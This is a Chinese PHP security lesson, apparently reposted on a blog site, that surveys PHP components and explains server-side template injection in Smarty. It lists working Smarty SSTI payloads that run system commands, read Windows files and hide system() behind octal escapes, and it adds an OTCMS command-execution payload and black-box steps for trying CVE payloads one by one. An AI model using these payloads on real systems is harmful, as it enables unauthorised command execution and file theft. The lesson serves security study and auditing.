第30天:Web开发-PHP应用组件框架前端模版渲染三方插件富文本编辑器CVE审计

#知识点

1、安全开发-原生PHP-开发组件集合

2、安全开发-原生PHP-模版引擎渲染

3、安全开发-原生PHP-第三方编辑器

组件/框架

说明

[Web框架]

Laravel

现代化、功能全面的框架,适合大多数Web应用。

Symfony

高度模块化、功能强大的框架,适合复杂应用。

CodeIgniter

轻量级框架,适合快速开发。

Zend Framework (Laminas)

企业级框架,适合大规模应用,具有高扩展性和性能。

Yii

高性能框架,适合快速开发和大规模应用。

[数据库组件]

Doctrine ORM

强大的ORM工具,支持复杂的查询和映射。

Eloquent ORM

Laravel内置ORM,简化数据库操作。

PDO

PHP的数据库抽象层,支持多种数据库引擎。

RedBeanPHP

轻量级ORM,自动创建和管理数据库表。

[模板引擎]

Twig

灵活、现代的模板引擎,常用于Symfony项目。

Blade

Laravel内置模板引擎,支持模板继承和控制结构。

Smarty

经典模板引擎,适合中大型项目。

Mustache

轻量级跨语言模板引擎,支持PHP、JavaScript等。

[路由组件]

FastRoute

高性能PHP路由库,适用于小型应用和API。

AltoRouter

轻量级路由库,适合小型项目,易于配置。

Symfony Routing

Symfony的路由组件,适合复杂应用。

[认证与授权]

OAuth2 Server PHP

实现OAuth2协议的PHP库,适用于API认证。

JWT (JSON Web Token)

轻量级身份验证方案,适合API认证。

PHP-Auth

简单的用户认证库,适用于中小型Web应用。

[支付集成]

Stripe PHP SDK

集成Stripe支付功能,支持信用卡支付、订阅等。

PayPal SDK for PHP

集成PayPal支付功能,支持支付、退款等。

[邮件发送]

PHPMailer

功能强大的邮件发送库,支持SMTP、POP3等协议。

SwiftMailer

另一款流行的邮件发送库,支持多种邮件功能。

Mailgun PHP SDK

Mailgun的官方SDK,用于通过Mailgun API发送邮件。

[文件管理]

Flysystem

文件存储抽象库,支持多种存储方式(如本地、Amazon S3、FTP等)。

Symfony Filesystem

Symfony的文件系统组件,提供简单的文件操作API。

Intervention Image

图片处理库,支持裁剪、调整大小、水印等功能。

[缓存与性能]

Redis

内存数据存储系统,用于缓存、消息队列等,提升性能。

Memcached

内存缓存系统,适用于高并发应用。

Symfony Cache

Symfony缓存组件,支持多种缓存后端。

Laravel Cache

Laravel内置缓存系统,提升Web应用性能。

[日志管理]

Monolog

强大的日志库,支持多种日志渠道(如文件、数据库、邮件等)。

Log4PHP

Apache Log4j的PHP实现,适用于复杂日志功能。

[任务队列]

Laravel Queue

Laravel内置队列系统,支持延迟任务、异步处理。

Resque

基于Redis的任务队列库,适用于异步任务处理。

RabbitMQ

开源消息代理服务,用于任务调度和消息传递。

[WebSocket与实时通信]

Ratchet

用于实现WebSocket服务,适合在线聊天、实时通信。

Swoole

高性能协程框架,支持WebSocket、TCP、UDP等协议,适用于高并发实时应用。

[测试与调试]

PHPUnit

PHP标准单元测试框架,广泛用于自动化测试。

Xdebug

PHP调试工具,支持堆栈跟踪、性能分析、断点调试等功能。

[富文本编辑器]

KindEditor

一个轻量级且功能丰富的富文本编辑器,支持图片上传、插入视频等,适用于PHP开发的Web项目。

TinyMCE

开源的富文本编辑器,支持多种格式的文本编辑,插件丰富,易于集成。

CKEditor

高度可定制的富文本编辑器,支持图片、文件上传、富文本格式化等功能,广泛用于Web项目中。

Froala Editor

轻量级、现代的富文本编辑器,支持图像处理、视频嵌入、内嵌富文本等,适合复杂的Web应用。

Quill

开源富文本编辑器,功能强大、轻量级,支持图片、视频、格式设置等功能,适合单页面应用。

Summernote

基于jQuery的轻量级富文本编辑器,支持文本格式化、图片上传等,适合中小型Web项目。

Trumbowyg

轻量级的富文本编辑器,功能简单但支持基本的文本编辑、图片上传、视频插入等。

Redactor

现代的富文本编辑器,功能丰富,支持图片、文件上传等,适合多种Web应用。

[图片上传组件]

Dropzone.js

支持拖拽上传和多文件上传的JavaScript库,易于与PHP集成,常用于图片、文件上传功能。

FilePond

高度可定制的文件上传库,支持图片预览、验证、上传进度等,适合需要精美上传功能的Web项目。

Fine Uploader

支持多种文件上传方式的组件,支持多文件上传、拖拽上传,支持PHP处理后台。

Plupload

支持多种文件上传方式(包括HTML5和Flash),可以与PHP后台集成,广泛用于Web应用中。

[图片处理组件]

ImageMagick

强大的图像处理库,支持图像格式转换、剪裁、旋转、加水印等多种功能,适用于PHP处理图像。

GD Library

PHP内置图像处理库,支持图像创建、缩放、裁剪、色调调整等功能。

Intervention Image

PHP图像处理库,支持裁剪、缩放、加水印等,易于与Laravel集成。

一、模版引擎

1、模板引擎:

是为了让前端界(html)与程序代码(php)分离而产生的一种解决方案,简单来说就是html文件里再也不用写php代码了。Smarty的原理是变量替换原则,我们只需在html文件写好Smarty的标签即可,例{name},然后调用Smarty的方法传递变量参数即可。在页面渲染的时候,可以通过变量统一修改不同界面的显示;

2、模版使用案例:

Php模版框架:Smarty、Twig,codeeval等

python模版框架:jinja2、mako、tornad、Django等

Java模版框架:Thymeleaf、jade、velocity、FreeMarker等

JavaScript模版框架:doT,Nunjucks,Pug,Marko,EJS,Dust等

3、安全漏洞影响:

SSTI(Server Side Template Injection,服务器端模板注入)

4、Smarty模板引擎漏洞实验

下载:https://github.com/smarty-php/smarty/releases

使用:

①创建一个文件夹,命名为30 php framwork

②下载Smarty对应版本并解压缩到该文件夹中。

③创建一个PHP文件,命名为demo.php,并在文件中添加以下代码:

<?php

// 引入 Smarty 类文件

require('smarty3/libs/Smarty.class.php');

// 创建 Smarty 实例

$smarty = new Smarty;

// 设置 Smarty 相关属性

$smarty->template_dir = 'smarty3/templates/';

$smarty->compile_dir = 'smarty3/templates_c/';

$smarty->cache_dir = 'smarty3/cache/';

$smarty->config_dir = 'smarty3/configs/';

// 赋值变量到模板中

$smarty->assign('title', '欢迎使用 Smarty');

// 显示模板

$smarty->display('index.tpl');

?>

④在smarty3/templates目录下,创建一个名为index.tpl(index.tpl与index.html功能类似,都是用来在前端展示)的模板文件,并将以下代码复制到上述点定义文件夹中

<!DOCTYPE html>

<html>

<head>

<title>{$title}</title>

</head>

<body>

<h1>{$title}</h1>

<p>这是一个使用 Smarty 的例子。</p>

</body>

</html>

POC:?page=string:{function name='x(){};system(whoami);function '}{/function}

漏洞出现的原因:url存在可控变量page,可以构造执行POC

smarty的模板引擎,最后显示的还是以编译(compile)文件夹下的内容为主,所以POC的执行结果才会显示出来

5、渲染文件受控

①CVE参考:

https://xz.aliyun.com/t/11108

https://www.cnblogs.com/magic-zero/p/8351974.html

②cve漏洞利用poc->不同版本smarty利用成功度不一样:

*/phpinfo();//

string:{include file='C:/Windows/win.ini'}

string:{function name='x(){};system(whoami);function '}{/function}

string:{$smarty.template_object->smarty->_getSmartyObj()->display('string:{system(whoami)}')}

eval:{math equation='("\163\171\163\164\145\155")("\167\150\157\141\155\151")'}

③白盒代码审计的思路:

判断是否使用smarty模版引擎 ->smarty版本存在已知的CVE漏洞 ->可控的渲染文件或变量(漏洞利用的关键点 )

④黑盒渗透测试的思路:

通过指纹识别、php+功能点判断是否使用了smarty模板引擎 +或者url路径显示x.php?page= url= index.tpl index.html->出版判断可能用到了smarty->如果无法明确smarty版本->对存在已知的CVE漏洞,一个个POC测试

二、插件组件

编辑器、邮箱,图片处理等(见上图)

使用:ueditor编辑器存在漏洞

https://www.cnblogs.com/qq350760546/p/6669112.html

参考:https://www.cnblogs.com/linglinglingling/p/18040866

https://blog.csdn.net/weixin_58099903/article/details/125810825

三、案例:

代码审CMS:(由第三方框架/组件应用引用导致安全问题)

1、网钛(OTCMS漏洞):

https://xz.aliyun.com/t/13432  */SSTI(Server Side Template Injection,服务器端模板注入)

POC:{otcms:$smarty.template_object->smarty->_getSmartyObj()->display('string:{otcms:system(calc)}')}->此漏洞有些鸡肋,需要先admin登录进去,才可以修改模板,从而执行POC命令

漏洞点代码:

2、Kindeditor编辑器漏洞

原理:phpyuncms->使用了kindeditor编辑器->该编辑器存在漏洞->发现文件上传漏洞

https://www.cnblogs.com/TaoLeonis/p/14899198.html

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处:http://www.rhkb.cn/news/503065.html

如若内容造成侵权/违法违规/事实不符,请联系长河编程网进行投诉反馈email:809451989@qq.com,一经查实,立即删除!

相关文章

解决ESP32 wifi scan:1. 获取WIFI扫描列表个数为0 的问题 2.扫描WIFI列表时导致程序崩溃问题。

1. 获取WIFI扫描列表个数为0 的问题 参考ESP32的wifi scan例子&#xff0c;出问题的程序源码&#xff1a; 分析原因&#xff1a; 查看esp_wifi.c的源码&#xff0c;我们会发现&#xff1a; 上面意思就是但调用esp_wifi_scan_get_ap_records获取AP列表后&#xff0c;将会…

【动态重建】时间高斯分层的长体积视频

标题&#xff1a;Representing Long Volumetric Video with Temporal Gaussian Hierarchy 来源&#xff1a;浙江大学 链接&#xff1a;https://zju3dv.github.io/longvolcap/ 文章目录 摘要一、前言二、主要方法2.1 时间高斯分层2.2 高效渲染2.3 层次结构更新2.4 紧凑的外观模型…

mongodb==安装prisma连接

官网下载mongodb,解压安装 Download MongoDB Community Server | MongoDB 修改bin/mongod.cfg # mongod.conf# for documentation of all options, see: # http://docs.mongodb.org/manual/reference/configuration-options/# Where and how to store data. storage:dbPat…

conda安装及demo:SadTalker实现图片+音频生成高质量视频

1.安装conda 下载各个版本地址&#xff1a;https://repo.anaconda.com/archive/ win10版本&#xff1a; Anaconda3-2023.03-1-Windows-x86_64 linux版本&#xff1a; Anaconda3-2023.03-1-Linux-x86_64 Windows安装 环境变量 conda -V2.配置conda镜像源 安装pip conda…

TDengine + MQTT :车联网时序数据库如何高效接入

现代新能源汽车&#xff0c;作为一种内部系统极为复杂的交通工具&#xff0c;配备了大量传感器、导航设备、应用软件&#xff0c;这些传感器产生的数据都需要上报到车联网平台当中。对于这些车辆的状态数据&#xff08;如车速、发动机转速等&#xff09;、位置数据&#xff08;…

LabVIEW瞬变电磁接收系统

利用LabVIEW软件与USB4432采集卡开发瞬变电磁接收系统。系统通过改进硬件配置与软件编程&#xff0c;解决了传统仪器在信噪比低和抗干扰能力差的问题&#xff0c;实现了高精度的数据采集和处理&#xff0c;特别适用于地质勘探等领域。 ​ 项目背景&#xff1a; 瞬变电磁法是探…

【读书与思考】历史是一个好东西

【AI论文解读】【AI知识点】【AI小项目】【AI战略思考】【AI日记】【读书与思考】 导言 以后《AI日记》专栏我想专注于 AI 相关的学习、成长和工作等。而与 AI 无关的一些读书、思考和闲聊&#xff0c;我打算写到这里&#xff0c;我会尽量控制自己少想和少写。 下图的一些感想…

网络层协议之IP数据包层分片随笔

1.全篇内容均在图中&#xff0c;如何分片以及分片举例细节拆解&#xff0c;见下图: 1.1分片公式&#xff1a; 上述公式中有关/8 再*8目的是为了使用8字节对齐&#xff0c;从而使的分片数据包均为8字节整数倍&#xff01; 1.2.ip层数据包分片计算&图解

Python爬虫基础——认识网页结构(各种标签的使用)

1、添加<div>标签的代码定义了两个区块的宽度和高度均为100px&#xff0c;边框的格式也相同&#xff0c;只是区块中显示的内容不同&#xff1b; 2、添加<ul>和<ol>标签分别用于定义无序列表和有序列表。<il>标签位于<ul>标签或<ol>标签之…

牛客网刷题 ——C语言初阶(6指针)——字符逆序

1. 题目描述&#xff1a;字符逆序 牛客网题目链接 将一个字符串str的内容颠倒过来&#xff0c;并输出。 输入描述: 输入一个字符串&#xff0c;可以有空格 输出描述: 输出逆序的字符串 示例1 输入 I am a student 输出 tneduts a ma I 2. 思路 首先字符串逆序&#xff0c;之…

安徽省乡镇界面图层+arcgis数据shp格式-乡镇名称和编码2020年+wgs84坐标内容测评

最新安徽省乡镇界面图层arcgis数据shp格式-乡镇名称和编码2020年wgs84坐标无偏移

Telephony Netd

1、Linux补充知识 iptables iptables是Linux防火墙系统的重要组成部分,iptables的主要功能是实现对网络数据包进出设备及转发的控制。当数据包需要进入设备、从设备中流出或者由该设备转发、路由时,都可以使用iptables进行控制。 Netlink Netlink套接字是用以实现用户进程与内…

HashMap总结使用+原理+面试

文章目录 1.Hashmap的基本使用创建hashmap对象。遍历hashmap统计字母出现的次数用来投票计算返回JSON数据 2.hashmap源码阅读put源码阅读 3. HashMap 面试题目hashmap实现的原理什么时候数组需要进行扩容hashmap怎么确定把数据放到那个节点的哪个位置。为什么用 n - 1 与运算&a…

SpringMVC(四)响应

目录 数据处理及跳转 1. 结果跳转方式 ①.ModelAndView ②.ServletAPI 1、通过HttpServletResponse进行输出 2、通过HttpServletResponse实现请求转发 3、通过HttpServletResponse实现重定向 ③.SpringMVC 1.直接输出 2.请求转发 3.重定向 2.ResponseBody响应json数…

Mac软件介绍之录屏软件Filmage Screen

软件介绍 Filmage Screen 是一款专业的视频录制和编辑软件&#xff0c;适用于 Mac 系统 可以选择4k 60fps&#xff0c;可以选择录制电脑屏幕&#xff0c;摄像头录制&#xff0c;可以选择区域录制。同时也支持&#xff0c;简单的视频剪辑。 可以同时录制电脑麦克风声音 标准…

欧科云链研究院:ChatGPT 眼中的 Web3

编辑&#xff5c;OKG Research 转眼间&#xff0c;2024年已经进入尾声&#xff0c;Web3 行业经历了热闹非凡的一年。今年注定也是属于AI的重要一年&#xff0c;OKG Research 决定拉上 ChatGPT 这位“最懂归纳的AI拍档”&#xff0c;尝试把一整年的研究内容浓缩成精华。我们一共…

.NET 9.0 WebApi 发布到 IIS 详细步骤

微软表示&#xff0c;.NET 9 是迄今为止性能最高的 .NET 版本&#xff0c;对运行时、工作负载和语言方面进行了 1,000 多项与性能相关的改进&#xff0c;并采用了更高效的算法来生成更好的代码。 .NET 9 是 .NET 8 的继任者&#xff0c;特别侧重于云原生应用和性能。 作为标准期…

【通识安全】煤气中毒急救的处置

1.煤气中毒的主要症状与体征一氧化碳中毒&#xff0c;其中毒症状一般分为轻、中、重三种。 (1)轻度&#xff1a;仅有头晕、头痛、眼花、心慌、胸闷、恶心等症状。如迅速打开门窗&#xff0c;或将病人移出中毒环境&#xff0c;使之吸入新鲜空气和休息&#xff0c;给些热饮料&am…

ECCV`24 | 首次解决文本到3D NeRFs分解问题!港中文等提出DreamDissector

论文链接&#xff1a;https://arxiv.org/abs/2407.16260 亮点直击 据作者所知&#xff0c;作者是第一个解决文本到3D NeRFs分解问题的团队。 为了解决这个问题&#xff0c;本文引入了一个名为DreamDissector的新颖框架&#xff0c;包括一种新颖的神经类别场&#xff08;NeCF&a…

nginx-灰度发布策略(split_clients)

一. 简述&#xff1a; 基于客户端的灰度发布&#xff08;也称为蓝绿部署或金丝雀发布&#xff09;是一种逐步将新版本的服务或应用暴露给部分用户&#xff0c;以确保在出现问题时可以快速回滚并最小化影响的技术。对于 Nginx&#xff0c;可以通过配置和使用不同的模块来实现基于…